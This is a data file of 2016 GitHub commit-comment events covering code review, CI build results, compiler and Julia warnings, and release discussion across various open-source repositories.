{"id":"4611439013","type":"CommitCommentEvent","actor":{"login":"gmpreussner"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19154445,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-23T23:23:04Z","updated_at":"2016-09-23T23:23:04Z","body":">> We want to load the VLC plugins with...\r\n\r\nOk, in that case, I think what you want to do is load the plug-ins with _LoadLibraryEx(pluginFileName, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32)_. This will force System32 as the only search directory for the plug-in DLL and all of its dependencies. Do the same for core and other desired libraries. I believe that you don't need _SetDefaultDllDirectories_ at all.\r\n\r\n>> Also, why don't other applications call SetDefaultDllDirectory before init VLC, if they want a different behaviour?\r\n\r\nSo, it looks like it's actually possible to reset the flags with _SetDefaultDllDirectories_, and it gives the desired result if I call it after libvlc's initialization. I don't know why it works though - it seems to me that it shouldn't, because dependency DLLs can the reset the security restrictions for the entire application."}},"created_at":"2016-09-23T23:23:04Z"}
{"id":"4611442743","type":"CommitCommentEvent","actor":{"login":"montyvesselinov"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19154451,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-23T23:24:22Z","updated_at":"2016-09-23T23:24:22Z","body":"Also these WARNINGS:\n\nWARNING: New definition\n    +(AbstractArray, DataArrays.DataArray) at\n/Users/monty/.julia/v0.4/DataArrays/src/operators.jl:276\nis ambiguous with:\n    +(WoodburyMatrices.SymWoodbury, AbstractArray{T<:Any, 2}) at\n/Users/monty/.julia/v0.4/WoodburyMatrices/src/SymWoodburyMatrices.jl:107.\nTo fix, define\n    +(WoodburyMatrices.SymWoodbury, DataArrays.DataArray{T<:Any, 2})\nbefore the new definition.\nWARNING: New definition\n    +(AbstractArray, DataArrays.AbstractDataArray) at\n/Users/monty/.julia/v0.4/DataArrays/src/operators.jl:300\nis ambiguous with:\n    +(WoodburyMatrices.SymWoodbury, AbstractArray{T<:Any, 2}) at\n/Users/monty/.julia/v0.4/WoodburyMatrices/src/SymWoodburyMatrices.jl:107.\nTo fix, define\n    +(WoodburyMatrices.SymWoodbury, DataArrays.AbstractDataArray{T<:Any, 2})\nbefore the new definition.\n\n-monty\n\nOn Fri, Sep 23, 2016 at 4:53 PM, monty <velimir.vesselinov@gmail.com> wrote:\n\n> I am also getting these WARNINGS; are there plans these to be resolved?\n> What should I do to avoid these? Thank you very much!\n>\n>\n> WARNING: New definition\n>     ./(Images.AbstractImageDirect, AbstractArray) at\n> /home/vvv/.julia/v0.4/Images/src/algorithms.jl:55\n> is ambiguous with:\n>     ./(AbstractArray, Union{DataArrays.DataArray,\n> DataArrays.PooledDataArray}) at /home/vvv/.julia/v0.4/\n> DataArrays/src/broadcast.jl:287.\n> To fix, define\n>     ./(Images.AbstractImageDirect, Union{DataArrays.DataArray,\n> DataArrays.PooledDataArray})\n> before the new definition.\n> WARNING: New definition\n>     .==(Images.AbstractImageDirect{Bool, N<:Any}, AbstractArray{Bool,\n> N<:Any}) at /home/vvv/.julia/v0.4/Images/src/algorithms.jl:187\n> is ambiguous with:\n>     .==(AbstractArray{Bool, N<:Any}, Union{DataArrays.DataArray{Bool,\n> N<:Any}, DataArrays.PooledDataArray{Bool, R<:Integer, N<:Any}}) at\n> /home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:345.\n> To fix, define\n>     .==(Images.AbstractImageDirect{Bool, N<:Any},\n> Union{DataArrays.DataArray{Bool, N<:Any}, DataArrays.PooledDataArray{Bool,\n> R<:Integer, N<:Any}})\n> before the new definition.\n> WARNING: New definition\n>     .==(Images.AbstractImageDirect, AbstractArray) at\n> /home/vvv/.julia/v0.4/Images/src/algorithms.jl:188\n> is ambiguous with:\n>     .==(AbstractArray{Bool, N<:Any}, Union{DataArrays.DataArray{Bool,\n> N<:Any}, DataArrays.PooledDataArray{Bool, R<:Integer, N<:Any}}) at\n> /home/vvv/.julia/v0.4/DataArrays/src/broadcast.jl:345.\n> To fix, define\n>     .==(Images.AbstractImageDirect{Bool, N<:Any},\n> Union{DataArrays.DataArray{Bool, N<:Any}, DataArrays.PooledDataArray{Bool,\n> R<:Integer, N<:Any}})\n> before the new definition.\n> WARNING: New definition\n>     .==(Images.AbstractImageDirect, AbstractArray) at\n> /home/vvv/.julia/v0.4/Images/src/algorithms.jl:188\n> is ambiguous with:\n>     .==(AbstractArray, Union{DataArrays.DataArray,\n> DataArrays.PooledDataArray}) at /home/vvv/.julia/v0.4/\n> DataArrays/src/broadcast.jl:287.\n> To fix, define\n>     .==(Images.AbstractImageDirect, Union{DataArrays.DataArray,\n> DataArrays.PooledDataArray})\n> before the new definition.\n>\n> -monty\n>\n> On Fri, Sep 23, 2016 at 1:20 PM, monty <velimir.vesselinov@gmail.com>\n> wrote:\n>\n>> Done.\n>> On Fri, Sep 23, 2016 at 12:36 PM Tony Kelman <notifications@github.com>\n>> wrote:\n>>\n>>> best to declare a minimum version that implements the features you need,\n>>> here I think it's 0.7.15 for Compat.String\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/madsjulia/Mads.jl/commit/db827c14bbb8b88499c01fd13624bdc848837ad2#commitcomment-19150936>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AFXxeCa1f4IC2Fadt3aY-MXiwMRzRrKqks5qtBw0gaJpZM4KFRNS>\n>>> .\n>>>\n>> --\n>> -monty\n>>\n>\n>\n"}},"created_at":"2016-09-23T23:24:22Z"}
{"id":"4611443183","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154453,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T23:24:32Z","updated_at":"2016-09-23T23:24:32Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1133 of 1684 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-67.28%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-30.88%25-red.svg)</a>\n"}},"created_at":"2016-09-23T23:24:32Z"}
{"id":"4611443735","type":"CommitCommentEvent","actor":{"login":"arlowhite"},"repo":{"name":"Dogfalo/materialize"},"payload":{"comment":{"id":19154455,"position":6,"line":180,"path":"jade/page-contents/modals_content.html","commit_id":"3be5561ea1a63f9c0580f9cf109376944324935a","created_at":"2016-09-23T23:24:44Z","updated_at":"2016-09-23T23:24:44Z","body":"@acburst Should this alert() call still be here?"}},"created_at":"2016-09-23T23:24:44Z"}
{"id":"4611445362","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154459,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T23:25:18Z","updated_at":"2016-09-23T23:25:18Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T23:25:18Z"}
{"id":"4611450370","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154480,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T23:27:07Z","updated_at":"2016-09-23T23:27:07Z","body":"But 100% there will be something like this released soon **livestreamer-v1.12.2-win32-setup.exe**  \r\nThis is a installer which contains:\r\n\r\nA compiled version of Livestreamer that does not require an existing Python installation\r\nRTMPDump for viewing RTMP streams\r\nand performs the following tasks:\r\n\r\nGenerates a default configuration file\r\nAdds Livestreamer to your $PATH (making it possible to use livestreamer directly from the command prompt without specifying its directory)\r\n\r\nYou guys are working toward that release, right?"}},"created_at":"2016-09-23T23:27:07Z"}
{"id":"4611451192","type":"CommitCommentEvent","actor":{"login":"thuvejan"},"repo":{"name":"thuvejan/ImageHash"},"payload":{"comment":{"id":19154483,"position":67,"line":0,"path":"app.js","commit_id":"070514bc67da2b5ba1708af3a2115d81f056e313","created_at":"2016-09-23T23:27:26Z","updated_at":"2016-09-23T23:27:26Z","body":"Yeah, your right I should have split the `config` variable and `inRange()` into their own commits, but I worked on this over a few weeks and was changing code a lot. I didn't want code in one commit that would be completely removed in the next."}},"created_at":"2016-09-23T23:27:26Z"}
{"id":"4611451341","type":"CommitCommentEvent","actor":{"login":"Kentzo"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19154484,"position":null,"line":null,"path":null,"commit_id":"2e3888dd45f878b18883b00cd08677392b5d02e0","created_at":"2016-09-23T23:27:29Z","updated_at":"2016-09-23T23:27:29Z","body":"@gena-moscow I think it was a typo: `fd_entry_t fd_entry = family_entry.fd_entries [i];` -> `fd_entry_t& fd_entry = family_entry.fd_entries [i];`"}},"created_at":"2016-09-23T23:27:29Z"}
{"id":"4611456478","type":"CommitCommentEvent","actor":{"login":"jonata"},"repo":{"name":"jonata/opendvdproducer"},"payload":{"comment":{"id":19154495,"position":null,"line":null,"path":null,"commit_id":"84f7f3ef9b3af3ecb17ac984e35094dea46bafca","created_at":"2016-09-23T23:29:20Z","updated_at":"2016-09-23T23:29:20Z","body":":D \"buttons\""}},"created_at":"2016-09-23T23:29:20Z"}
{"id":"4611457821","type":"CommitCommentEvent","actor":{"login":"Kentzo"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19154502,"position":null,"line":null,"path":null,"commit_id":"2e3888dd45f878b18883b00cd08677392b5d02e0","created_at":"2016-09-23T23:29:49Z","updated_at":"2016-09-23T23:29:49Z","body":"@gena-moscow Actually it was in the original version I commited. But was later modified by @dbc60 in https://github.com/zeromq/libzmq/commit/4019112a82a9b08b13ae7c25929b3bc3d6e0c7de."}},"created_at":"2016-09-23T23:29:49Z"}
{"id":"4611459853","type":"CommitCommentEvent","actor":{"login":"Kentzo"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19154504,"position":null,"line":null,"path":null,"commit_id":"4019112a82a9b08b13ae7c25929b3bc3d6e0c7de","created_at":"2016-09-23T23:30:29Z","updated_at":"2016-09-23T23:30:29Z","body":"@dbc60 Under what circumstances this vector gets reallocated while we iterate here?"}},"created_at":"2016-09-23T23:30:29Z"}
{"id":"4611465729","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19154527,"position":33,"line":78,"path":"packages/react-scripts/package.json","commit_id":"7ac8777ed1cebec6084a03e84272cfd21128b356","created_at":"2016-09-23T23:32:41Z","updated_at":"2016-09-23T23:32:41Z","body":"Not intentional. This commit was done by Lerna. Maybe we should `--skip-git`."}},"created_at":"2016-09-23T23:32:41Z"}
{"id":"4611471658","type":"CommitCommentEvent","actor":{"login":"mootpoint"},"repo":{"name":"FozLand/fozland"},"payload":{"comment":{"id":19154543,"position":null,"line":null,"path":null,"commit_id":"31abcf37afb1bd7c29abeb8a9f9190db7d4208e0","created_at":"2016-09-23T23:34:57Z","updated_at":"2016-09-23T23:34:57Z","body":"I like that too"}},"created_at":"2016-09-23T23:34:57Z"}
{"id":"4611472555","type":"CommitCommentEvent","actor":{"login":"kshvmdn"},"repo":{"name":"thuvejan/ImageHash"},"payload":{"comment":{"id":19154545,"position":67,"line":0,"path":"app.js","commit_id":"070514bc67da2b5ba1708af3a2115d81f056e313","created_at":"2016-09-23T23:35:14Z","updated_at":"2016-09-23T23:35:14Z","body":"I was actually just talking about that single function --\r\n\r\n```js\r\nif (a) {\r\n  return true;\r\n}\r\nreturn false;\r\n```"}},"created_at":"2016-09-23T23:35:14Z"}
{"id":"4611472867","type":"CommitCommentEvent","actor":{"login":"mootpoint"},"repo":{"name":"FozLand/fozland"},"payload":{"comment":{"id":19154546,"position":null,"line":null,"path":null,"commit_id":"31abcf37afb1bd7c29abeb8a9f9190db7d4208e0","created_at":"2016-09-23T23:35:21Z","updated_at":"2016-09-23T23:35:21Z","body":"Should cheap tnt be addressed here or in tnt mod"}},"created_at":"2016-09-23T23:35:21Z"}
{"id":"4611472874","type":"CommitCommentEvent","actor":{"login":"mrhenryyu"},"repo":{"name":"mrhenryyu/minimal-mistakes"},"payload":{"comment":{"id":19154547,"position":null,"line":null,"path":null,"commit_id":"7be7490c7f408a12f8e94225700a5287c390c3f4","created_at":"2016-09-23T23:35:21Z","updated_at":"2016-09-23T23:35:21Z","body":"Updated to original "}},"created_at":"2016-09-23T23:35:21Z"}
{"id":"4611474306","type":"CommitCommentEvent","actor":{"login":"Ethervil"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19154553,"position":null,"line":null,"path":null,"commit_id":"050fd07fa93e980098072f1fb95f73edffb8226d","created_at":"2016-09-23T23:35:46Z","updated_at":"2016-09-23T23:35:46Z","body":"Thanks! The next two enemies I'll add are the MM2 Sniper Joe and the MM5 Giree."}},"created_at":"2016-09-23T23:35:46Z"}
{"id":"4611475951","type":"CommitCommentEvent","actor":{"login":"jhcole"},"repo":{"name":"FozLand/fozland"},"payload":{"comment":{"id":19154561,"position":null,"line":null,"path":null,"commit_id":"31abcf37afb1bd7c29abeb8a9f9190db7d4208e0","created_at":"2016-09-23T23:36:21Z","updated_at":"2016-09-23T23:36:21Z","body":"I'm making an issue for that discussion."}},"created_at":"2016-09-23T23:36:21Z"}
{"id":"4611477076","type":"CommitCommentEvent","actor":{"login":"sevein"},"repo":{"name":"artefactual/atom"},"payload":{"comment":{"id":19154565,"position":39,"line":39,"path":"lib/task/migrate/migrations/arMigration0146.class.php","commit_id":"b7fc22546beab9f3b3f1980f58ca518c2fd76c3d","created_at":"2016-09-23T23:36:48Z","updated_at":"2016-09-23T23:36:48Z","body":"😭 "}},"created_at":"2016-09-23T23:36:48Z"}
{"id":"4611482837","type":"CommitCommentEvent","actor":{"login":"thuvejan"},"repo":{"name":"thuvejan/ImageHash"},"payload":{"comment":{"id":19154588,"position":67,"line":0,"path":"app.js","commit_id":"070514bc67da2b5ba1708af3a2115d81f056e313","created_at":"2016-09-23T23:38:57Z","updated_at":"2016-09-23T23:38:57Z","body":"Oh yeah... I'll make that into one `return` statement. You're quite the code reviewer, thanks."}},"created_at":"2016-09-23T23:38:57Z"}
{"id":"4611484880","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19154593,"position":370,"line":370,"path":"assignment7/css/style.css","commit_id":"13b1a2c8b1cc4459d66f5a0b11cea0082fed2697","created_at":"2016-09-23T23:39:42Z","updated_at":"2016-09-23T23:39:42Z","body":"Out of curiosity, did you try targeting these elements individually?  I'm wondering if these all need to have this styling applied...I think having so many on hear may be contributing to the content overlap \r\n<img width=\"404\" alt=\"screen shot 2016-09-23 at 4 32 58 pm\" src=\"https://cloud.githubusercontent.com/assets/2281667/18804169/519a4414-81ac-11e6-98d3-9397a92a214e.png\">\r\n<img width=\"717\" alt=\"screen shot 2016-09-23 at 4 33 24 pm\" src=\"https://cloud.githubusercontent.com/assets/2281667/18804170/519c3256-81ac-11e6-864d-c5551b2ace65.png\">\r\n\r\n"}},"created_at":"2016-09-23T23:39:42Z"}
{"id":"4611486234","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19154597,"position":330,"line":330,"path":"assignment7/css/style.css","commit_id":"13b1a2c8b1cc4459d66f5a0b11cea0082fed2697","created_at":"2016-09-23T23:40:14Z","updated_at":"2016-09-23T23:40:14Z","body":"Nice work 👍 "}},"created_at":"2016-09-23T23:40:14Z"}
{"id":"4611486730","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19154599,"position":319,"line":319,"path":"assignment7/css/style.css","commit_id":"13b1a2c8b1cc4459d66f5a0b11cea0082fed2697","created_at":"2016-09-23T23:40:25Z","updated_at":"2016-09-23T23:40:25Z","body":"Lookin' good! 👍 "}},"created_at":"2016-09-23T23:40:25Z"}
{"id":"4611487274","type":"CommitCommentEvent","actor":{"login":"samuraitruong"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19154603,"position":null,"line":null,"path":null,"commit_id":"16f0b5b43b8d0665a0407e3c17b9931532520a51","created_at":"2016-09-23T23:40:37Z","updated_at":"2016-09-23T23:40:37Z","body":"Thanks @jjskuld  , that is my mistake when using rename refactoring too. I added new config but it change the existing config"}},"created_at":"2016-09-23T23:40:37Z"}
{"id":"4611487560","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19154604,"position":418,"line":418,"path":"assignment7/css/style.css","commit_id":"13b1a2c8b1cc4459d66f5a0b11cea0082fed2697","created_at":"2016-09-23T23:40:44Z","updated_at":"2016-09-23T23:40:44Z","body":"Nice work removing the float on the mobile version"}},"created_at":"2016-09-23T23:40:44Z"}
{"id":"4611488476","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19154609,"position":400,"line":400,"path":"assignment7/css/style.css","commit_id":"13b1a2c8b1cc4459d66f5a0b11cea0082fed2697","created_at":"2016-09-23T23:41:07Z","updated_at":"2016-09-23T23:41:07Z","body":"I'd suggest still having some margin/padding, just not as much as on desktop"}},"created_at":"2016-09-23T23:41:07Z"}
{"id":"4611488521","type":"CommitCommentEvent","actor":{"login":"fson"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19154610,"position":33,"line":78,"path":"packages/react-scripts/package.json","commit_id":"7ac8777ed1cebec6084a03e84272cfd21128b356","created_at":"2016-09-23T23:41:08Z","updated_at":"2016-09-23T23:41:08Z","body":"I think we'll want to push the updated version numbers to git though, `lerna publish` updates them and release script currently deletes the copy in `$clean_path` after that. Need to think how to make the release script work better with the monorepo."}},"created_at":"2016-09-23T23:41:08Z"}
{"id":"4611496592","type":"CommitCommentEvent","actor":{"login":"denehyg"},"repo":{"name":"denehyg/reveal.js-menu"},"payload":{"comment":{"id":19154631,"position":null,"line":null,"path":null,"commit_id":"a1000f912d649c28a279b48b68bab1217b7be894","created_at":"2016-09-23T23:44:23Z","updated_at":"2016-09-23T23:44:23Z","body":"Yes, you're correct. The fix in this commit is specifically to add the closing parenthesis, but as I believe the explicit check for true to be unnecessary I removed it also."}},"created_at":"2016-09-23T23:44:23Z"}
{"id":"4611499288","type":"CommitCommentEvent","actor":{"login":"jcouv"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":19154636,"position":null,"line":null,"path":null,"commit_id":"1f4f25da30c42f8085d0da0cdcb97e82a740add0","created_at":"2016-09-23T23:45:25Z","updated_at":"2016-09-23T23:45:25Z","body":"Thanks"}},"created_at":"2016-09-23T23:45:25Z"}
{"id":"4611504176","type":"CommitCommentEvent","actor":{"login":"sinpycn"},"repo":{"name":"sinpycn/learning"},"payload":{"comment":{"id":19154661,"position":null,"line":null,"path":null,"commit_id":"e54b468791971d5d696b33a05bb9ca2abc8829de","created_at":"2016-09-23T23:47:22Z","updated_at":"2016-09-23T23:47:22Z","body":"OK"}},"created_at":"2016-09-23T23:47:22Z"}
{"id":"4611505284","type":"CommitCommentEvent","actor":{"login":"edisonpl"},"repo":{"name":"rehy/cordova-plugin-sms-receiver"},"payload":{"comment":{"id":19154665,"position":null,"line":null,"path":null,"commit_id":"f6bffb179fd28d2aa91bc5d7a6f1de26b2541f63","created_at":"2016-09-23T23:47:48Z","updated_at":"2016-09-23T23:47:48Z","body":"Hi Ratson, \r\nthere is an error when installing the plugin\r\n\\SmsReceiverPlugin.java:116: error: cannot find symbol\r\nContextCompat.checkSelfPermission(this.cordova.getActivity(), type));\r\n                             ^\r\nsymbol:   method checkSelfPermission(Activity,String)\r\n location: class ContextCompat\r\n\r\n\\SmsReceiverPlugin.java:121: error: cannot find symbol\r\n            ActivityCompat.requestPermissions(this.cordova.getActivity(), new String[]{type}, requestCode);\r\n                          ^\r\n  symbol:   method requestPermissions(Activity,String[],int)\r\n  location: class ActivityCompat\r\n\r\n\\SmsReceiver.java uses or overrides a deprecated API.\r\nNote: Recompile with -Xlint:deprecation for details.\r\n\r\nYou Know what is the problem ?"}},"created_at":"2016-09-23T23:47:48Z"}
{"id":"4611512252","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154686,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T23:50:35Z","updated_at":"2016-09-23T23:50:35Z","body":"#27 does pretty much all of this. It doesn't do the config file yet, but it's easy to add. No you won't. The installer bundles Python's installer inside of itself so it'll install Python for you."}},"created_at":"2016-09-23T23:50:35Z"}
{"id":"4611513093","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"CocoaPods/CocoaPods-app"},"payload":{"comment":{"id":19154689,"position":null,"line":null,"path":null,"commit_id":"58cdb14a808ddbcc86d2213a9d5fac07bf8ccf42","created_at":"2016-09-23T23:50:57Z","updated_at":"2016-09-23T23:50:57Z","body":"58cdb14"}},"created_at":"2016-09-23T23:50:57Z"}
{"id":"4611513759","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"CocoaPods/CocoaPods-app"},"payload":{"comment":{"id":19154693,"position":13,"line":107,"path":"Rakefile","commit_id":"58cdb14a808ddbcc86d2213a9d5fac07bf8ccf42","created_at":"2016-09-23T23:51:12Z","updated_at":"2016-09-23T23:51:12Z","body":"Thanks"}},"created_at":"2016-09-23T23:51:12Z"}
{"id":"4611515838","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"CocoaPods/CocoaPods-app"},"payload":{"comment":{"id":19154701,"position":null,"line":null,"path":null,"commit_id":"eecebbe6ad6fe2260076f662ee462396d22f679d","created_at":"2016-09-23T23:52:02Z","updated_at":"2016-09-23T23:52:02Z","body":" Yes, please subscribe me to the CC newsletter"}},"created_at":"2016-09-23T23:52:02Z"}
{"id":"4611518514","type":"CommitCommentEvent","actor":{"login":"jkeam"},"repo":{"name":"metricfu/metric_fu"},"payload":{"comment":{"id":19154708,"position":5,"line":4,"path":"Gemfile","commit_id":"68aa5db8ba549ab9af6c3bee45e817ca028280a4","created_at":"2016-09-23T23:53:04Z","updated_at":"2016-09-23T23:53:04Z","body":"Please correct me if I'm wrong, but those versions of Ruby (2.2.5 and 2.3.1) currently don't require this hack, which is why I didn't include anything for them.\r\n\r\nCheck out the travis build after I added in 2.2.5 and 2.3.1.\r\nhttps://travis-ci.org/jkeam/metric_fu/builds/162349307\r\n\r\nI think we should allow latest (meaning not doing this hack) for Ruby versions 2.2.5 and 2.3.1 until they break; which would indicate most likely that one of our deps have dropped support for that version of Ruby.  At that point, when travis (or whatever CI) indicates a problem, we can apply this hack again for the broken Ruby and lock down the dep to the last version that supported said broken Ruby."}},"created_at":"2016-09-23T23:53:04Z"}
{"id":"4611524189","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19154729,"position":33,"line":78,"path":"packages/react-scripts/package.json","commit_id":"7ac8777ed1cebec6084a03e84272cfd21128b356","created_at":"2016-09-23T23:55:24Z","updated_at":"2016-09-23T23:55:24Z","body":"Yeah.. For now I ran it with `--skip-git` and will have to bump numbers manually. Not super happy about it. "}},"created_at":"2016-09-23T23:55:24Z"}
{"id":"4611528214","type":"CommitCommentEvent","actor":{"login":"mcantelon"},"repo":{"name":"artefactual/atom"},"payload":{"comment":{"id":19154741,"position":39,"line":39,"path":"lib/task/migrate/migrations/arMigration0146.class.php","commit_id":"b7fc22546beab9f3b3f1980f58ca518c2fd76c3d","created_at":"2016-09-23T23:57:01Z","updated_at":"2016-09-23T23:57:01Z","body":"D'oh! "}},"created_at":"2016-09-23T23:57:01Z"}
{"id":"4611535066","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19154760,"position":null,"line":null,"path":null,"commit_id":"26f76c0b4545c8baa3e951f2563b89bbdda533a0","created_at":"2016-09-23T23:59:49Z","updated_at":"2016-09-23T23:59:49Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36045/testReport/) for this commit**"}},"created_at":"2016-09-23T23:59:49Z"}
{"id":"4606320125","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140258,"position":4,"line":65,"path":"index.php","commit_id":"9a44b5d2de0ebdbd48fe006e99d27a3e84a6a44d","created_at":"2016-09-23T03:00:29Z","updated_at":"2016-09-23T03:00:29Z","body":"２番目\r\n検索ワードが合った場合の表示する件数の修正"}},"created_at":"2016-09-23T03:00:29Z"}
{"id":"4606320471","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19140259,"position":null,"line":null,"path":null,"commit_id":"a6c08d87d27f5550ceccca724cc43b76cc4bd501","created_at":"2016-09-23T03:00:38Z","updated_at":"2016-09-23T03:00:38Z","body":"小吐槽，active的动词形式是activate，所以不写activated写actived是什么鬼。。。"}},"created_at":"2016-09-23T03:00:38Z"}
{"id":"4606324483","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140272,"position":50,"line":197,"path":"index.php","commit_id":"9a44b5d2de0ebdbd48fe006e99d27a3e84a6a44d","created_at":"2016-09-23T03:02:08Z","updated_at":"2016-09-23T03:02:08Z","body":"３番目"}},"created_at":"2016-09-23T03:02:08Z"}
{"id":"4606324789","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140273,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T03:02:15Z","updated_at":"2016-09-23T03:02:15Z","body":"iteration (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-23T03:02:15Z"}
{"id":"4606326434","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140274,"position":42,"line":190,"path":"index.php","commit_id":"9a44b5d2de0ebdbd48fe006e99d27a3e84a6a44d","created_at":"2016-09-23T03:02:54Z","updated_at":"2016-09-23T03:02:54Z","body":"３番目"}},"created_at":"2016-09-23T03:02:54Z"}
{"id":"4606327047","type":"CommitCommentEvent","actor":{"login":"asimay"},"repo":{"name":"asimay/robot_localization"},"payload":{"comment":{"id":19140275,"position":null,"line":null,"path":null,"commit_id":"daa6d021451a0894055486bc7eee1f35f4179085","created_at":"2016-09-23T03:03:10Z","updated_at":"2016-09-23T03:03:10Z","body":"sorry. I'm not familiar with github client. please ignorse this commit."}},"created_at":"2016-09-23T03:03:10Z"}
{"id":"4606329634","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140281,"position":null,"line":null,"path":null,"commit_id":"9235685d22508fbbed29a2f81a553749d9219c7f","created_at":"2016-09-23T03:04:13Z","updated_at":"2016-09-23T03:04:13Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T03:04:13Z"}
